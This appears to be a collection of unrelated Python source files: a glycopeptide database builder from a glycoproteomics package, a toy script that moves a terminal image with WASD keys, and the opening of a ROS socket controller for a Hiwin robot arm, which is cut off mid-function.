						self.summarize(c)
				else:
					self.summarize_multi(computed)
				# Refill the queue with the next chunk from the reader
				self.producer()
			except:
				if self.raiseExc:
					raise
			finally:
				# Advance the hand-off marker even on failure so other
				# workers are not dead-locked waiting for this index.
				LargeFileHandler.HAND = index
				self.queue.task_done()
|
common.py | import itertools
from uuid import uuid4
from collections import defaultdict, Counter
from multiprocessing import Process, Queue, Event, RLock
from threading import Thread
from itertools import product
try:
from Queue import Empty as QueueEmptyException
except ImportError:
from queue import Empty as QueueEmptyException
from glypy import Composition
from glypy.composition import formula
from glypy.structure.glycan_composition import FrozenGlycanComposition
from glycan_profiling.serialize import DatabaseBoundOperation, func
from glycan_profiling.serialize.hypothesis import GlycopeptideHypothesis
from glycan_profiling.serialize.hypothesis.peptide import Glycopeptide, Peptide, Protein, ProteinSite
from glycan_profiling.serialize.hypothesis.glycan import (
GlycanCombination, GlycanClass, GlycanComposition,
GlycanTypes, GlycanCombinationGlycanComposition)
from glycan_profiling.serialize.utils import toggle_indices
from glycan_profiling.task import TaskBase
from glycan_profiling.database.builder.glycan import glycan_combinator
from glycan_profiling.database.builder.base import HypothesisSerializerBase
from glycopeptidepy.structure.sequence import (
_n_glycosylation, _o_glycosylation, _gag_linker_glycosylation)
_DEFAULT_GLYCAN_STEP_LIMIT = 15000
def slurp(session, model, ids, flatten=True):
    """Fetch `model` rows by primary key in batches of 100.

    When `flatten` is True, `ids` is a list of id-lists and is flattened
    first. Returns all matched rows as a single list.
    """
    if flatten:
        ids = list(itertools.chain.from_iterable(ids))
    batch_size = 100
    records = []
    for start in range(0, len(ids), batch_size):
        records.extend(session.query(model).filter(
            model.id.in_(ids[start:start + batch_size])))
    return records
class GlycopeptideHypothesisSerializerBase(DatabaseBoundOperation, HypothesisSerializerBase):
    """Common machinery for Glycopeptide Hypothesis construction.

    Attributes
    ----------
    uuid : str
        The uuid of the hypothesis to be constructed
    """
    def __init__(self, database_connection, hypothesis_name=None, glycan_hypothesis_id=None, full_cross_product=True):
        DatabaseBoundOperation.__init__(self, database_connection)
        self._hypothesis_name = hypothesis_name
        self._hypothesis_id = None
        self._hypothesis = None
        self._glycan_hypothesis_id = glycan_hypothesis_id
        self.uuid = str(uuid4().hex)
        # -1 marks "not yet computed"; set by combinate_glycans()
        self.total_glycan_combination_count = -1
        self.full_cross_product = full_cross_product

    def _construct_hypothesis(self):
        """Create and persist the GlycopeptideHypothesis row lazily."""
        if self._hypothesis_name is None or self._hypothesis_name.strip() == "":
            self._hypothesis_name = self._make_name()
        # BUGFIX: check the private attribute. The original read the
        # `glycan_hypothesis_id` property here, which calls back into
        # _construct_hypothesis when the value is None — infinite
        # recursion instead of the intended ValueError.
        if self._glycan_hypothesis_id is None:
            raise ValueError("glycan_hypothesis_id must not be None")
        self._hypothesis = GlycopeptideHypothesis(
            name=self._hypothesis_name, glycan_hypothesis_id=self._glycan_hypothesis_id,
            uuid=self.uuid)
        self.session.add(self._hypothesis)
        self.session.commit()
        # Cache the persisted values back onto the instance
        self._hypothesis_id = self._hypothesis.id
        self._hypothesis_name = self._hypothesis.name
        self._glycan_hypothesis_id = self._hypothesis.glycan_hypothesis_id

    def _make_name(self):
        """Default hypothesis name derived from this run's uuid."""
        return "GlycopeptideHypothesis-" + self.uuid

    @property
    def glycan_hypothesis_id(self):
        # Lazily constructs the hypothesis on first access
        if self._glycan_hypothesis_id is None:
            self._construct_hypothesis()
        return self._glycan_hypothesis_id

    @property
    def n_glycan_only(self):
        # Lazily constructs the hypothesis on first access
        if self._hypothesis is None:
            self._construct_hypothesis()
        return self._hypothesis.n_glycan_only

    def peptide_ids_with_n_glycosites(self):
        """Return ids of peptides spanning at least one N-glycosylation site."""
        # May include the residue beyond the final
        # BUGFIX: the hypothesis-id comparison is parenthesized. `&` binds
        # tighter than `==` in Python, so without parentheses the original
        # compared the AND-ed expression to the id instead of filtering on
        # Protein.hypothesis_id.
        q = self.session.query(Peptide.id.distinct()).join(Protein).join(Protein.sites).filter(
            Peptide.spans(ProteinSite.location) &
            (ProteinSite.name == ProteinSite.N_GLYCOSYLATION) &
            (Protein.hypothesis_id == self._hypothesis_id)).all()
        return [i[0] for i in q]

    def peptide_ids(self):
        """Return all peptide ids to glycosylate for this hypothesis."""
        if self.n_glycan_only:
            return self.peptide_ids_with_n_glycosites()
        q = self.session.query(Peptide.id).filter(Peptide.hypothesis_id == self._hypothesis_id).all()
        return [i[0] for i in q]

    def combinate_glycans(self, n):
        """Generate all combinations of up to `n` glycans and record the count."""
        combinator = glycan_combinator.GlycanCombinationSerializer(
            self.engine, self.glycan_hypothesis_id,
            self.hypothesis_id, n)
        combinator.run()
        self.total_glycan_combination_count = combinator.total_count
        if not (self.total_glycan_combination_count > 0):
            raise ValueError("No glycan combinations were generated. No glycopeptides can be produced!")

    def _count_produced_glycopeptides(self):
        """Count generated glycopeptides, log it and store it as a parameter."""
        count = self.query(
            func.count(Glycopeptide.id)).filter(
            Glycopeptide.hypothesis_id == self.hypothesis_id).scalar()
        self.log("Generated %d glycopeptides" % count)
        self.set_parameters({
            "database_size": count
        })
        return count

    def _sql_analyze_database(self):
        """Refresh DB query-planner statistics after bulk inserts."""
        self.log("Analyzing Indices")
        self._analyze_database()
        if self.is_sqlite():
            # SQLite needs the analysis plan reloaded in this connection
            self._sqlite_reload_analysis_plan()
        self.log("Done Analyzing Indices")
class GlycopeptideHypothesisDestroyer(DatabaseBoundOperation, TaskBase):
    """Delete a GlycopeptideHypothesis and all of its dependent rows.

    Deletion proceeds child-to-parent (glycopeptides -> peptides ->
    proteins -> hypothesis) so no dangling references remain.
    """
    def __init__(self, database_connection, hypothesis_id):
        DatabaseBoundOperation.__init__(self, database_connection)
        # id of the hypothesis to destroy
        self.hypothesis_id = hypothesis_id
    def delete_glycopeptides(self):
        """Bulk-delete all Glycopeptide rows of the hypothesis."""
        self.log("Delete Glycopeptides")
        self.session.query(Glycopeptide).filter(
            Glycopeptide.hypothesis_id == self.hypothesis_id).delete(
            synchronize_session=False)
        self.session.commit()
    def delete_peptides(self):
        """Delete Peptide rows protein-by-protein for the hypothesis."""
        self.log("Delete Peptides")
        q = self.session.query(Protein.id).filter(Protein.hypothesis_id == self.hypothesis_id)
        for protein_id, in q:
            self.session.query(Peptide).filter(
                Peptide.protein_id == protein_id).delete(
                synchronize_session=False)
        self.session.commit()
    def delete_protein(self):
        """Bulk-delete Protein rows of the hypothesis."""
        self.log("Delete Protein")
        self.session.query(Protein).filter(Protein.hypothesis_id == self.hypothesis_id).delete(
            synchronize_session=False)
        self.session.commit()
    def delete_hypothesis(self):
        """Delete the GlycopeptideHypothesis row itself."""
        self.log("Delete Hypothesis")
        self.session.query(GlycopeptideHypothesis).filter(
            GlycopeptideHypothesis.id == self.hypothesis_id).delete()
        self.session.commit()
    def run(self):
        """Execute the full deletion sequence, children before parents."""
        self.delete_glycopeptides()
        self.delete_peptides()
        self.delete_protein()
        self.delete_hypothesis()
        self.session.commit()
def distinct_glycan_classes(session, hypothesis_id):
    """Return the distinct glycan structure-class names used by the
    glycan combinations of `hypothesis_id`."""
    rows = session.query(GlycanClass.name.distinct()).join(
        GlycanComposition.structure_classes).join(
        GlycanCombinationGlycanComposition).join(
        GlycanCombination).filter(
        GlycanCombination.hypothesis_id == hypothesis_id).all()
    return [name for (name,) in rows]
def composition_to_structure_class_map(session, glycan_hypothesis_id):
    """Map each GlycanComposition id to the list of its structure-class
    names for the given glycan hypothesis."""
    mapping = defaultdict(list)
    rows = session.query(GlycanComposition.id, GlycanClass.name).join(
        GlycanComposition.structure_classes).filter(
        GlycanComposition.hypothesis_id == glycan_hypothesis_id).all()
    for composition_id, class_name in rows:
        mapping[composition_id].append(class_name)
    return mapping
def combination_structure_class_map(session, hypothesis_id, composition_class_map):
    """Map each GlycanCombination id to a list with one entry per member
    occurrence: that member composition's structure-class list taken from
    `composition_class_map`."""
    mapping = defaultdict(list)
    rows = session.query(
        GlycanCombinationGlycanComposition).join(GlycanCombination).filter(
        GlycanCombination.hypothesis_id == hypothesis_id).order_by(GlycanCombination.id)
    for glycan_id, combination_id, count in rows:
        # The same class-list object is repeated `count` times on purpose.
        mapping[combination_id].extend([composition_class_map[glycan_id]] * count)
    return mapping
class GlycanCombinationPartitionTable(TaskBase):
    """Index glycan combinations by (member count, per-class counts).

    Lookup via table[size, {class_name: count}] returns all combinations
    with `size` members whose structure-class assignment matches the
    given per-class counts.
    """
    def __init__(self, session, glycan_combinations, glycan_classes, hypothesis):
        self.session = session
        # tables[size][class-count-key] -> list of combination entries
        self.tables = defaultdict(lambda: defaultdict(list))
        self.hypothesis_id = hypothesis.id
        self.glycan_hypothesis_id = hypothesis.glycan_hypothesis_id
        self.glycan_classes = glycan_classes
        self.build_table(glycan_combinations)
    def build_table(self, glycan_combinations):
        """Populate the nested lookup table.

        A combination whose member compositions carry several structure
        classes is registered once per possible class assignment (the
        cartesian product over the members' class lists).
        """
        composition_class_map = composition_to_structure_class_map(
            self.session, self.glycan_hypothesis_id)
        combination_class_map = combination_structure_class_map(
            self.session, self.hypothesis_id, composition_class_map)
        for entry in glycan_combinations:
            size_table = self.tables[entry.count]
            component_classes = combination_class_map[entry.id]
            class_assignment_generator = product(*component_classes)
            for classes in class_assignment_generator:
                # Key: how many members fall into each known glycan class
                counts = Counter(c for c in classes)
                key = tuple(counts[c] for c in self.glycan_classes)
                class_table = size_table[key]
                class_table.append(entry)
    def build_key(self, mapping):
        """Convert a {class_name: count} mapping to the canonical tuple key."""
        return tuple(mapping.get(c, 0) for c in self.glycan_classes)
    def get_entries(self, size, mapping):
        """Return combinations of `size` members matching the class counts."""
        key = self.build_key(mapping)
        return self.tables[size][key]
    def __getitem__(self, key):
        # Supports the table[size, {class_name: count}] subscript syntax
        size, mapping = key
        return self.get_entries(size, mapping)
def limiting_combinations(iterable, n, limit=100):
    """Yield at most `limit` combinations of size `n` from `iterable`.

    The original incremented a counter and checked it *after* yielding,
    so it produced `limit + 1` combinations; islice stops at exactly
    `limit`.
    """
    return itertools.islice(itertools.combinations(iterable, n), limit)
class GlycanCombinationRecord(object):
    """A detached, memory-light snapshot of a GlycanCombination row.

    Uses __slots__ because large hypotheses create very many records;
    derived compositions are computed lazily and cached.
    """
    __slots__ = [
        'id', 'calculated_mass', 'formula', 'count', 'glycan_composition_string',
        '_composition', '_dehydrated_composition']

    def __init__(self, combination):
        self._composition = None
        self._dehydrated_composition = None
        self.id = combination.id
        self.count = combination.count
        self.formula = combination.formula
        self.calculated_mass = combination.calculated_mass
        self.glycan_composition_string = combination.composition

    def total_composition(self):
        """Elemental composition of the whole combination (lazily cached)."""
        cached = self._composition
        if cached is None:
            cached = self.convert().total_composition()
            self._composition = cached
        return cached

    def dehydrated_composition(self):
        """Total composition minus one water per member glycan (cached)."""
        cached = self._dehydrated_composition
        if cached is None:
            cached = self.total_composition() - (Composition("H2O") * self.count)
            self._dehydrated_composition = cached
        return cached

    def convert(self):
        """Re-parse the stored composition string into a glycan object."""
        parsed = FrozenGlycanComposition.parse(self.glycan_composition_string)
        parsed.id = self.id
        parsed.count = self.count
        return parsed

    def __repr__(self):
        return "GlycanCombinationRecord(%d, %s)" % (
            self.id, self.glycan_composition_string)
class PeptideGlycosylator(object):
    """Combine peptides with glycan combinations into glycopeptide records.

    Glycan combinations can be loaded in windows (offset/limit) to bound
    memory use when the combination table is very large.
    """
    def __init__(self, session, hypothesis_id, glycan_offset=None, glycan_limit=_DEFAULT_GLYCAN_STEP_LIMIT):
        self.session = session
        self.glycan_offset = glycan_offset
        self.glycan_limit = glycan_limit
        self.hypothesis_id = hypothesis_id
        self.hypothesis = self.session.query(GlycopeptideHypothesis).get(hypothesis_id)
        self.total_combinations = self._get_total_combination_count()
        self.build_glycan_table(self.glycan_offset)

    def _get_total_combination_count(self):
        """Number of glycan combinations attached to this hypothesis."""
        count = self.session.query(
            GlycanCombination).filter(
            GlycanCombination.hypothesis_id == self.hypothesis_id).count()
        return count

    def _load_glycan_records(self):
        """Load the combination records, or a windowed slice of them.

        NOTE(review): only the no-offset branch wraps the rows in
        GlycanCombinationRecord — preserved as-is from the original;
        confirm whether the windowed branch should wrap too.
        """
        if self.glycan_offset is None:
            glycan_combinations = self.session.query(
                GlycanCombination).filter(
                GlycanCombination.hypothesis_id == self.hypothesis_id).all()
            glycan_combinations = [GlycanCombinationRecord(gc) for gc in glycan_combinations]
        else:
            glycan_combinations = self.session.query(
                GlycanCombination).filter(
                GlycanCombination.hypothesis_id == self.hypothesis_id).offset(
                self.glycan_offset).limit(self.glycan_limit).all()
        return glycan_combinations

    def _build_size_table(self, glycan_combinations):
        """Index the loaded combinations by size and glycan-class counts."""
        self.glycan_combination_partitions = GlycanCombinationPartitionTable(
            self.session, glycan_combinations, distinct_glycan_classes(
                self.session, self.hypothesis_id), self.hypothesis)

    def build_glycan_table(self, offset=None):
        """(Re)build the partition table starting at `offset`."""
        self.glycan_offset = offset
        glycan_combinations = self._load_glycan_records()
        self._build_size_table(glycan_combinations)

    def handle_peptide(self, peptide):
        """Yield glycopeptide record dicts for every way of glycosylating
        `peptide`.

        N-linked, O-linked and GAG-linker glycosylation were handled by
        three verbatim copies of the same loop in the original; they differ
        only in the site list, the glycan class keyed on, and the
        modification applied, so the shared machinery now lives in
        `_glycosylate`. Yields N-linked, then O-linked, then GAG records,
        matching the original order.
        """
        water = Composition("H2O")
        peptide_composition = Composition(str(peptide.formula))
        obj = peptide.convert()
        reference = obj.clone()
        site_specs = (
            (peptide.n_glycosylation_sites, GlycanTypes.n_glycan, _n_glycosylation),
            (peptide.o_glycosylation_sites, GlycanTypes.o_glycan, _o_glycosylation),
            (peptide.gagylation_sites, GlycanTypes.gag_linker, _gag_linker_glycosylation),
        )
        for sites, glycan_type, modification_rule in site_specs:
            # Only sites not already occupied by a modification are usable
            unoccupied = set(sites)
            for site in list(unoccupied):
                if obj[site][1]:
                    unoccupied.remove(site)
            for record in self._glycosylate(peptide, reference,
                                            peptide_composition, water,
                                            unoccupied, glycan_type,
                                            modification_rule):
                yield record

    def _glycosylate(self, peptide, reference, peptide_composition, water,
                     unoccupied_sites, glycan_type, modification_rule):
        """Yield record dicts occupying 1..len(unoccupied_sites) sites with
        glycan combinations of the matching size and class."""
        for i in range(1, len(unoccupied_sites) + 1):
            for gc in self.glycan_combination_partitions[i, {glycan_type: i}]:
                # Each attachment loses one water per glycan in the combination
                total_mass = peptide.calculated_mass + gc.calculated_mass - (gc.count * water.mass)
                formula_string = formula(peptide_composition + gc.dehydrated_composition())
                for site_set in limiting_combinations(unoccupied_sites, i):
                    sequence = reference.clone()
                    for site in site_set:
                        sequence.add_modification(site, modification_rule.name)
                    sequence.glycan = gc.convert()
                    yield dict(
                        calculated_mass=total_mass,
                        formula=formula_string,
                        glycopeptide_sequence=str(sequence),
                        peptide_id=peptide.id,
                        protein_id=peptide.protein_id,
                        hypothesis_id=peptide.hypothesis_id,
                        glycan_combination_id=gc.id)
def null_log_handler(msg):
    """Fallback log handler used when no IPC logger is provided: echo to stdout."""
    print(msg)
class PeptideGlycosylatingProcess(Process):
    """Worker process that reads batches of peptide ids from ``input_queue``,
    generates their glycopeptides with :class:`PeptideGlycosylator`, and
    persists results every ``chunk_size`` records via :meth:`process_result`.
    """
    process_name = "glycopeptide-build-worker"
    def __init__(self, connection, hypothesis_id, input_queue, chunk_size=5000, done_event=None,
                 log_handler=null_log_handler, glycan_offset=None,
                 glycan_limit=_DEFAULT_GLYCAN_STEP_LIMIT):
        Process.__init__(self)
        # Daemonize so an orphaned worker cannot outlive the parent process.
        self.daemon = True
        self.connection = connection
        self.input_queue = input_queue
        self.chunk_size = chunk_size
        self.hypothesis_id = hypothesis_id
        self.done_event = done_event
        self.log_handler = log_handler
        self.glycan_offset = glycan_offset
        self.glycan_limit = glycan_limit
        # Populated in task(), which runs inside the child process.
        self.session = None
        self.work_done_event = Event()
    def is_work_done(self):
        """Return True once this worker has drained its queue and flushed results."""
        return self.work_done_event.is_set()
    def process_result(self, collection):
        """Bulk-insert a batch of glycopeptide mapping dicts and commit."""
        self.session.bulk_insert_mappings(Glycopeptide, collection, render_nulls=True)
        self.session.commit()
    def load_peptides(self, work_items):
        """Fetch the Peptide records named by the ids in ``work_items``."""
        peptides = slurp(self.session, Peptide, work_items, flatten=False)
        return peptides
    def task(self):
        """Main worker loop: consume id batches until a None sentinel arrives
        or the queue stays empty after ``done_event`` is set."""
        database = DatabaseBoundOperation(self.connection)
        self.session = database.session
        has_work = True
        glycosylator = PeptideGlycosylator(
            database.session, self.hypothesis_id,
            glycan_offset=self.glycan_offset,
            glycan_limit=self.glycan_limit)
        result_accumulator = []
        n = 0
        n_gps = 0
        while has_work:
            try:
                work_items = self.input_queue.get(timeout=5)
                if work_items is None:
                    # None is the producer's explicit shutdown sentinel.
                    has_work = False
                    continue
            except Exception:
                # Queue.get timed out; only stop once the producer says it is done.
                if self.done_event.is_set():
                    has_work = False
                continue
            peptides = self.load_peptides(work_items)
            n += len(peptides)
            for peptide in peptides:
                for gp in glycosylator.handle_peptide(peptide):
                    result_accumulator.append(gp)
                    if len(result_accumulator) > self.chunk_size:
                        n_gps += len(result_accumulator)
                        self.process_result(result_accumulator)
                        result_accumulator = []
            # Flush the partial batch left over from this work item.
            if len(result_accumulator) > 0:
                n_gps += len(result_accumulator)
                self.process_result(result_accumulator)
                result_accumulator = []
        self.work_done_event.set()
        # It seems there is no public API to force the process to check if it is done
        # but the internal method is invoked when creating a Process `repr` on Python 2.
        # This problem supposedly doesn't exist in Python 3.
        repr(self)
        self.log_handler("Process %r completed. (%d peptides, %d glycopeptides)" % (self.pid, n, n_gps))
    def run(self):
        """Process entry point: set a friendly process name, run task(), log failures."""
        new_name = getattr(self, 'process_name', None)
        if new_name is not None:
            TaskBase().try_set_process_name(new_name)
        try:
            self.task()
        except Exception as e:
            import traceback
            self.log_handler(
                "An exception has occurred for %r.\n%r\n%s" % (
                    self, e, traceback.format_exc()))
class NonSavingPeptideGlycosylatingProcess(PeptideGlycosylatingProcess):
    """Variant that generates glycopeptides but discards every result batch
    (useful for benchmarking generation without database write cost)."""

    def process_result(self, collection):
        """Intentionally drop the batch instead of persisting it."""
class QueuePushingPeptideGlycosylatingProcess(PeptideGlycosylatingProcess):
    """Variant that hands finished batches to ``output_queue`` for a central
    writer process instead of writing them itself, and serializes its own
    database reads through a shared ``database_mutex``."""
    def __init__(self, connection, hypothesis_id, input_queue, output_queue, chunk_size=5000,
                 done_event=None, log_handler=null_log_handler, database_mutex=None,
                 glycan_offset=None, glycan_limit=_DEFAULT_GLYCAN_STEP_LIMIT):
        super(QueuePushingPeptideGlycosylatingProcess, self).__init__(
            connection, hypothesis_id, input_queue, chunk_size, done_event, log_handler,
            glycan_offset=glycan_offset, glycan_limit=glycan_limit)
        self.output_queue = output_queue
        self.database_mutex = database_mutex
    def load_peptides(self, work_items):
        """Load peptides while holding the shared mutex so reads do not
        contend with the coordinator's bulk inserts."""
        with self.database_mutex:
            result = super(QueuePushingPeptideGlycosylatingProcess, self).load_peptides(work_items)
        return result
    def process_result(self, collection):
        """Push the batch to the writer process instead of saving locally."""
        self.output_queue.put(collection)
class MultipleProcessPeptideGlycosylator(TaskBase):
    """Parallel glycopeptide builder.

    Deals batches of peptide ids to a pool of
    :class:`QueuePushingPeptideGlycosylatingProcess` workers over
    ``input_queue`` and bulk-inserts the glycopeptide mappings they push
    onto ``output_queue``, walking the glycan combination space
    ``glycan_limit`` combinations at a time.
    """

    def __init__(self, connection_specification, hypothesis_id, chunk_size=6500, n_processes=4,
                 glycan_combination_count=None, glycan_limit=_DEFAULT_GLYCAN_STEP_LIMIT):
        self.n_processes = n_processes
        self.connection_specification = connection_specification
        self.chunk_size = chunk_size
        self.hypothesis_id = hypothesis_id
        self.glycan_combination_count = glycan_combination_count
        self.current_glycan_offset = 0
        self.glycan_limit = glycan_limit
        self.input_queue = Queue(10)
        self.output_queue = Queue(1000)
        self.workers = []
        self.dealt_done_event = Event()
        self.ipc_controller = self.ipc_logger()
        self.database_mutex = RLock()

    def spawn_worker(self):
        """Create (but do not start) one queue-pushing worker process."""
        worker = QueuePushingPeptideGlycosylatingProcess(
            self.connection_specification, self.hypothesis_id, self.input_queue,
            self.output_queue, self.chunk_size, self.dealt_done_event,
            self.ipc_controller.sender(), self.database_mutex,
            glycan_offset=self.current_glycan_offset,
            glycan_limit=self.glycan_limit)
        return worker

    def push_work_batches(self, peptide_ids):
        """Deal slices of ``peptide_ids`` onto the input queue, then signal done."""
        n = len(peptide_ids)
        i = 0
        # 5% of the workload per batch, capped at 1000. Clamped to at least 1:
        # with fewer than 20 peptides, int(n * 0.05) is 0 and a zero chunk size
        # made this loop spin forever pushing empty slices.
        chunk_size = max(1, min(int(n * 0.05), 1000))
        while i < n:
            self.input_queue.put(peptide_ids[i:(i + chunk_size)])
            i += chunk_size
            self.log("... Dealt Peptides %d-%d %0.2f%%" % (i - chunk_size, min(i, n), (min(i, n) / float(n)) * 100))
        self.log("... All Peptides Dealt")
        self.dealt_done_event.set()

    def create_barrier(self):
        """Acquire the shared database mutex, pausing worker database reads."""
        self.database_mutex.__enter__()

    def teardown_barrier(self):
        """Release the shared database mutex."""
        self.database_mutex.__exit__(None, None, None)

    def create_queue_feeder_thread(self, peptide_ids):
        """Start a daemon thread that deals work batches to the workers."""
        queue_feeder = Thread(target=self.push_work_batches, args=(peptide_ids,))
        queue_feeder.daemon = True
        queue_feeder.start()
        return queue_feeder

    def spawn_all_workers(self):
        """Start ``n_processes`` fresh worker processes."""
        self.workers = []
        for i in range(self.n_processes):
            worker = self.spawn_worker()
            worker.start()
            self.workers.append(worker)

    def process(self, peptide_ids):
        """Run the full build: drop indices, iterate glycan windows, collect
        worker output and bulk-insert it, then rebuild indices.

        Raises ValueError if any worker exits with a non-zero exit code.
        """
        connection = DatabaseBoundOperation(self.connection_specification)
        session = connection.session
        self.log("Begin Creation. Dropping Indices")
        index_controller = toggle_indices(session, Glycopeptide)
        index_controller.drop()
        while self.current_glycan_offset < self.glycan_combination_count:
            _current_progress = float(self.current_glycan_offset + self.glycan_limit)
            _current_percent_complete = _current_progress / self.glycan_combination_count * 100.0
            _current_percent_complete = min(_current_percent_complete, 100.0)
            self.log("... Processing Glycan Combinations %d-%d (%0.2f%%)" % (
                self.current_glycan_offset, min(self.current_glycan_offset + self.glycan_limit,
                                                self.glycan_combination_count),
                _current_percent_complete))
            queue_feeder = self.create_queue_feeder_thread(peptide_ids)
            self.spawn_all_workers()
            has_work = True
            last = 0
            i = 0
            while has_work:
                try:
                    batch = self.output_queue.get(True, 5)
                    try:
                        waiting_batches = self.output_queue.qsize()
                        if waiting_batches > 10:
                            # Hold the mutex while draining so workers do not
                            # contend with the bulk insert below.
                            self.create_barrier()
                            self.log("... %d waiting sets." % (waiting_batches,))
                            try:
                                for _ in range(waiting_batches):
                                    batch.extend(self.output_queue.get(True, 1))
                                # check to see if any new work items have arrived while
                                # we've been draining the queue
                                waiting_batches = self.output_queue.qsize()
                                if waiting_batches != 0:
                                    # if so, while the barrier is up, let's write the batch
                                    # to disk and then try to drain the queue again
                                    i += len(batch)
                                    try:
                                        session.bulk_insert_mappings(Glycopeptide, batch, render_nulls=True)
                                        session.commit()
                                    except Exception:
                                        session.rollback()
                                        raise
                                    batch = []
                                    for _ in range(waiting_batches):
                                        batch.extend(self.output_queue.get_nowait())
                            except QueueEmptyException:
                                pass
                            self.teardown_barrier()
                    except NotImplementedError:
                        # platform does not support qsize()
                        pass
                    self.create_barrier()
                    i += len(batch)
                    try:
                        session.bulk_insert_mappings(Glycopeptide, batch, render_nulls=True)
                        session.commit()
                    except Exception:
                        session.rollback()
                        raise
                    finally:
                        self.teardown_barrier()
                    if (i - last) > self.chunk_size * 20:
                        self.log("... %d Glycopeptides Created" % (i,))
                        last = i
                except QueueEmptyException:
                    # Output queue idle; finish once every worker reports done.
                    if all(w.is_work_done() for w in self.workers):
                        has_work = False
                    continue
            queue_feeder.join()
            self.ipc_controller.stop()
            for worker in self.workers:
                self.log("Joining Process %r (%s)" % (worker.pid, worker.is_alive()))
                worker.join(10)
                if worker.is_alive():
                    self.log("Failed to join %r" % worker.pid)
                if worker.exitcode != 0 and worker.exitcode is not None:
                    raise ValueError("One or more workers failed to exit successfully")
            self.current_glycan_offset += self.glycan_limit
        self.log("All Work Done. Rebuilding Indices")
        index_controller.create()
|
consoleObama.py | import time
import ueberzug.lib.v0 as ueberzug
from pynput import keyboard
import os
os.system("color")
from termcolor import colored
from slowprint.slowprint import *
slowprint(colored("Made by Bira ❤️ ","magenta",attrs=['reverse','bold']),0.4)
import threading
demo = ""  # replaced by the ueberzug placement object once oabam_thread runs
# Per-key velocity contributions applied each frame by constant_movement;
# 'a'/'w' move negative (left/up), 's'/'d' move positive (down/right).
moving_w = 0
moving_a = 0
moving_s = 0
moving_d = 0
def oabam_thread():
    """Render obama.jpg via ueberzug and keep the canvas alive.

    The placement is published through the module-global ``demo`` so the
    movement thread can adjust its x/y. The canvas only exists while the
    ``with`` block is open, hence the effectively-infinite sleep.
    NOTE(review): "oabam" is a typo but the thread-target reference at the
    bottom of the file uses this exact name, so it is kept.
    """
    global demo
    with ueberzug.Canvas() as c:
        path = "obama.jpg"
        demo = c.create_placement('demo',x=0, y=0, scaler=ueberzug.ScalerOption.COVER.value)
        demo.path = path
        demo.visibility = ueberzug.Visibility.VISIBLE
        print(type(demo))
        time.sleep(999999999)
def on_press(key):
    """pynput press handler: start moving the image in the pressed direction.

    WASD keys set the corresponding velocity component; 'a' and 'w' are
    negative (left/up). Non-character keys just print a newline.
    """
    global demo
    global moving_a
    global moving_w
    global moving_s
    global moving_d
    try:
        pressed = key.char
    except AttributeError:
        # Special (non-character) key -- same newline the original emitted.
        print('\n')
        return
    if pressed == "d":
        moving_d = 1
    elif pressed == "a":
        moving_a = -1
    elif pressed == "s":
        moving_s = 1
    elif pressed == "w":
        moving_w = -1
def on_release(key):
    """pynput release handler: stop movement for the released WASD key.

    Returns False for Esc, which tells keyboard.Listener to stop.
    """
    global moving_a
    global moving_w
    global moving_s
    global moving_d
    if key == keyboard.Key.esc:
        # Stop listener
        return False
    try:
        released = key.char
    except AttributeError:
        # Was a bare `except:` -- narrowed to AttributeError (the only thing
        # key.char can raise here) so KeyboardInterrupt/SystemExit and real
        # bugs are no longer silently swallowed. Mirrors on_press.
        print("ERRORS")
        return
    if released == "d":
        moving_d = 0
    elif released == "a":
        moving_a = 0
    elif released == "s":
        moving_s = 0
    elif released == "w":
        moving_w = 0
def listener():
    """Block forever dispatching keyboard events to on_press/on_release.

    Runs in its own thread; exits when on_release returns False (Esc).
    """
    with keyboard.Listener(
        on_press=on_press,
        on_release=on_release) as listener:
        listener.join()
def constant_movement():
    """Apply the current WASD velocity to the image placement at ~30 FPS.

    Runs forever in its own thread.
    """
    global moving_a
    global moving_w
    global moving_s
    global moving_d
    global demo
    while True:
        # `demo` starts life as the empty string and is only replaced by the
        # ueberzug placement once oabam_thread runs; guard against winning
        # that race (the original crashed with AttributeError on str).
        if hasattr(demo, "x"):
            demo.x = demo.x + moving_a + moving_d
            demo.y = demo.y + moving_w + moving_s
        time.sleep(1/30)
    # (The original had an unreachable print("got here") after this loop;
    # removed since `while True` never falls through.)
# Spawn the three cooperating threads: renderer, key listener, mover.
obama_threaded = threading.Thread(target=oabam_thread)
obama_threaded.start()
listener_thread = threading.Thread(target=listener)
listener_thread.start()
# Give the renderer a moment to create the placement before moving it.
time.sleep(1)
move_thread= threading.Thread(target=constant_movement)
move_thread.start()
|
Hiwin_RT605_ArmCommand_Socket_20190627195308.py | #!/usr/bin/env python3
# license removed for brevity
import rospy
import os
import socket
##多執行序
import threading
import time
import sys
import matplotlib as plot
import HiwinRA605_socket_TCPcmd as TCP
import HiwinRA605_socket_Taskcmd as Taskcmd
import numpy as np
from std_msgs.msg import String
from ROS_Socket.srv import *
from ROS_Socket.msg import *
from std_msgs.msg import Int32MultiArray
import math
import enum
#Socket = 0
data = '0' # initial value of the command payload sent over the socket
Arm_feedback = 1 # assume the arm starts out busy
NAME = 'socket_server'
arm_mode_flag = False  # set True by Arm_Mode when a new command is pending
##------------ pose record ------------
class point():
    """Mutable 6-DOF pose: Cartesian position plus pitch/roll/yaw angles."""

    def __init__(self, x, y, z, pitch, roll, yaw):
        # Translation first, then orientation.
        self.x, self.y, self.z = x, y, z
        self.pitch, self.roll, self.yaw = pitch, roll, yaw
# Module-wide current target pose, updated by point_data().
pos = point(0.0,36.8,11.35,-90.0,0.0,0.0)
##------------ socket command record ------------
class socket_data():
    """Bundle of arm-command fields assembled into a socket packet."""

    def __init__(self, grip, setvel, ra, delay, setboth, action, Speedmode):
        # Assign all fields in one pass; names match the protocol fields.
        fields = (("grip", grip), ("setvel", setvel), ("ra", ra),
                  ("delay", delay), ("setboth", setboth),
                  ("action", action), ("Speedmode", Speedmode))
        for name, value in fields:
            setattr(self, name, value)
# Module-wide pending command, written by Arm_Mode()/Speed_Mode().
socket_cmd = socket_data(0,0.0,0,0,0,0,0)
##-----------switch define------------##
class switch(object):
    """Classic for-loop based switch/case helper.

    Usage::

        for case in switch(value):
            if case(A): ...; break
            if case(B): ...; break
    """
    def __init__(self, value):
        self.value = value
        self.fall = False

    def __iter__(self):
        """Return the match method once, then stop"""
        yield self.match
        # BUGFIX: the original explicitly `raise StopIteration` here. Under
        # PEP 479 (Python 3.7+) that is converted to RuntimeError whenever no
        # case matches and the for-loop asks for a second item (e.g. the idle
        # action value 6 in Socket_command). Returning normally ends the
        # generator with identical semantics on every Python version.

    def match(self, *args):
        """Indicate whether or not to enter a case suite"""
        if self.fall or not args:
            return True
